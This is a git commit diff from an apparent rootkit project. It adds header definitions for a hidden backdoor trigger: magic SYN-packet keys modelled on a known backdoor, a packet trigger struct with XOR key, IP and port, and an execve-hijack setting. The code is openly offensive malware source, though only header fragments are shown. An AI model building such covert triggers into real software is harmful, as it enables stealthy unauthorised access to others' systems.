Included new version of custom lib. Added checks for backdoor triggering

2025-12-25 19:03:07 +08:00 · 2022-05-04 04:40:25 -04:00
parent 25ef3acc5a
commit 073a911f74
21 changed files with 1799 additions and 2124 deletions
--- a/src/common/c&c.h
+++ b/src/common/c&c.h
@@ -7,5 +7,13 @@
 #define CC_PROT_FIN_PART "CC_FIN"
 #define CC_PROT_FIN CC_PROT_MSG CC_PROT_FIN_PART

+//C&C V1 -- bpv47-like trigger
+#define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10
+#define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
+#define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
+#define CC_TRIGGER_SYN_PACKET_KEY_3 "\x1F\x29"
+#define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02
+
+

 #endif
--- a/src/common/constants.h
+++ b/src/common/constants.h
@@ -20,6 +20,6 @@

 //EXECUTION HIJACKING
 #define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
-
+#define EXEC_HIJACK_ACTIVE_TEMP 0

 #endif
--- a/src/common/protocol.h
+++ b/src/common/protocol.h
@@ -0,0 +1,14 @@
+#ifndef __PROTOCOL_H
+#define __PROTOCOL_H
+
+struct trigger_t {
+    unsigned char xor_key;
+    unsigned int ip;
+    short unsigned int port;
+    unsigned char pad1;
+    short unsigned int pad2;
+    short unsigned int crc;
+};
+
+
+#endif